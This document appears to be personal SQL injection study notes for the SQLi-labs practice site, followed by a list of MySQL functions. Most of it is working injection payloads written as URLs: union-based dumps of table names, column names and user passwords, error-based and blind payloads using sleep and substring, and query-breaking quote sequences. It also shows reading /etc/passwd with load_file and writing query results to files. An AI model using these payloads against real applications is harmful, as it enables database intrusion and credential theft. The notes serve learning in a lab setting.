https://resources.infosecinstitute.com/tutorial-on-sqli-labs/#gref) 
https://dev.mysql.com/doc/refman/8.0/en/columns-table.html 
https://www.techonthenet.com/mysql/functions/index.php 

https://www.w3schools.com/sql/func_mysql_substring.asp
https://www.w3schools.com/sql/func_mysql_concat_ws.asp

[SQLiDumps-Series]
http://lab.in/sqli/Less-1/?id=-2 union select 1,2,3 -- -
http://lab.in/sqli/Less-2/?id=-1 union select 1,2,3 -- -
http://lab.in/sqli/Less-3/?id=-1') union select 1,2,3 -- -
http://lab.in/sqli/Less-4/?id=-1") union select 1,2,3 -- -
http://lab.in/sqli/Less-4/?id=-2") union select 1,table_name,3 from information_schema.tables where table_schema='security' -- -
[Fetch Table's Names]
http://lab.in/sqli/Less-4/?id=-2") union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' -- -
[Fetch Table's Column Names]
http://lab.in/sqli/Less-4/?id=-2') union select 1,group_concat(table_name),group_concat(column_name) from information_schema.columns where table_schema="security" -- +
[Fetch Column's of Table Field DATA]
http://lab.in/sqli/Less-4/?id=-2") union select 1,group_concat(username),group_concat(password) from users -- +

(Error Based)
select concat(cast(database() as char))
select concat(0x3a,cast(database() as char),0x3a)
select (select concat(0x3a,cast(database() as char),0x3a)) from information_schema.tables where table_schema=database()
select (select concat(0x3a,cast(database() as char),0x3a)) from information_schema.tables where table_schema=database() limit 0,1;
(select 1 from (select count(*),concat((-----),floor(rand(0)*2))a from information_schema.tables group by a)a)
Note: If we execute “floor(rand(0)*2)” multiple times with query it starting give error with result error

http://lab.in/sqli/Less-5/?id=1' order by 4 -- -
http://lab.in/sqli/Less-5/?id=1' OR 1 GROUP BY CONCAT_WS(0x3a,VERSION(),FLOOR(RAND(0)*2)) HAVING MIN(0) OR 1 -- -
http://lab.in/sqli/Less-5/?id=1' AND(select 1 from (select count(*),concat((-----),floor(rand(0)*2))a from information_schema.tables group by a)a) -- -

http://lab.in/sqli/Less-6/?id=1" -- -
http://lab.in/sqli/Less-6/?id=1" OR 1 GROUP BY CONCAT_WS(0x3a,VERSION(),FLOOR(RAND(0)*2)) HAVING MIN(0) OR 1 -- -

http://lab.in/sqli/Less-8/?id=1' and 1=1 -- -
http://lab.in/sqli/Less-8/?id=1' and substring(database(),1,1)="s" -- -  (start-1 lett,last-1 lett)
http://lab.in/sqli/Less-8/?id=1' and substring(database(),1,2)="se" -- - (start-1 lett,last-2 lett)

http://lab.in/sqli/Less-9/?id=1' and sleep(2) and substring(database(),1,1)="s" -- -


version() database() user() current_user 
***************************************************************
[Parameter]
 ‘ " \ / . ) ”) ’) #
' -- -   (SQL comment)
-- -
')-- -
“)-- -
# (SQL Comment)

[Advanced Functions]
ISNULL		BIN	          SYSTEM_USER
BINARY		CONV		     IFNULL
CASE		     CONVERT		CONNECTION_ID
CAST		     NULLIF	     LAST_INSERT_ID
COALESCE	     DATABASE	     CURRENT_USER
VERSION	     USER	          SESSION_USER

(SQL injection attempt) https://en.wikipedia.org/wiki/ASCII
0x7E is ~
0x27 is '
0x20 is a space character
0x3A is :  
version() database() user() current_user 
**********************************************************************************************************
# show databases;          
# use information_schema;       
# show tables;        
# desc tables;
# select count(*) from information_schema.tables ;
# select count(*) from information_schema.columns ;
# select table_name from information_schema,tables where table_schema='security';
# select table_name,column_name from information_schema.tables where table_schema="security";
# select table_name,column_name from information_schema.columns where table_schema="security";

(Error Based)
0x7E is ~      0x27 is '      0x20 is a space character     0x3A is :
# select concat((select database()));
# select concat(0x3a,0x3a,(select database()),0x3a,0x3a);
# select concat(0x3a,0x3a,(select database()),0x3a,0x3a)a;     {will print like 'a'}
# select concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2))a from information_schema.columns;
# select concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2))a from information_schema.tables;
# select concat(0x3a,0x3a,(select database()),0x3a,0x3a, floor(rand()*2))a from information_schema.columns group by a;

# select count(*),concat(0x3a,0x3a,(select database()),0x3a,0x3a, floor(rand()*2))a from information_schema.tables group by a;
# select count(*),concat(0x3a,0x3a,(select version()),0x3a,0x3a, floor(rand()*2))a from information_schema.tables group by a;
# select count(*),concat(0x3a,0x3a,(select user()),0x3a,0x3a, floor(rand()*2))a from information_schema.columns group by a;

(Outfile String)
[Only one row output write into a file]
# select * from users limit 0,1 into dumpfile "/tmp/t2.txt";

[More than one Row write into a file]
# select * from users limit 2,5 into outfile "/tmp/t.txt";

[Load texts from files]
# select load_file("/etc/passwd");

https://www.w3schools.com/sql/func_mysql_concat_ws.asp
The CONCAT_WS() function adds two or more expressions together with a separator.
Syntax
# SELECT CONCAT_WS("-", "SQL", "Tutorial", "is", "fun!") AS ConcatenatedString;
 result ⇒ SQL-Tutorial-is-fun!

select * from information_schema.columns limit 0,5;
********************************************************************************************************************
((The list of MySQL functions, sorted by category ))
===== String Functions =====
ASCII CHAR_LENGTH CHARACTER_LENGTH CONCAT CONCAT_WS FIELD FIND_IN_SET FORMAT INSERT INSTR LCASE 
LEFT LENGTH LOCATE LOWER LPAD LTRIM MID POSITION REPEAT REPLACE REVERSE 
RIGHT RPAD RTRIM SPACE STRCMP SUBSTR SUBSTRING SUBSTRING_INDEX TRIM UCASE UPPER 
===== Numeric/Math Functions ===== 
ABS ACOS ASIN ATAN ATAN2 AVG CEIL CEILING COS COT COUNT DEGREES 
DIV EXP FLOOR GREATEST LEAST LN LOG LOG10 LOG2 MAX MIN MOD 
PI POW POWER RADIANS RAND ROUND SIGN SIN SQRT SUM TAN TRUNCATE 
===== Date/Time Functions ===== 
ADDDATE ADDTIME CURDATE CURRENT_DATE CURRENT_TIME CURRENT_TIMESTAMP CURTIME DATE DATE_ADD DATE_FORMAT DATE_SUB DATEDIFF DAY DAYNAME DAYOFMONTH DAYOFWEEK DAYOFYEAR 
EXTRACT FROM_DAYS HOUR LAST_DAY LOCALTIME LOCALTIMESTAMP MAKEDATE MAKETIME MICROSECOND MINUTE MONTH MONTHNAME NOW PERIOD_ADD PERIOD_DIFF QUARTER SEC_TO_TIME 
SECOND STR_TO_DATE SUBDATE SUBTIME SYSDATE TIME TIME_FORMAT TIME_TO_SEC TIMEDIFF TIMESTAMP TO_DAYS WEEK WEEKDAY WEEKOFYEAR YEAR YEARWEEK 
===== Advanced Functions ===== 
BIN BINARY CASE CAST COALESCE CONNECTION_ID CONV 
CONVERT CURRENT_USER DATABASE IF IFNULL ISNULL LAST_INSERT_ID 
NULLIF SESSION_USER SYSTEM_USER USER VERSION 
===== Encryption Functions ===== 
ENCRYPT MD5 OLD_PASSWORD PASSWORD
